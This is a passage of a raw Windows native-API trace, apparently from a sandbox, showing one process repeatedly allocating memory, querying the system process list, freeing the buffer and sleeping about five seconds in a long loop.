ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 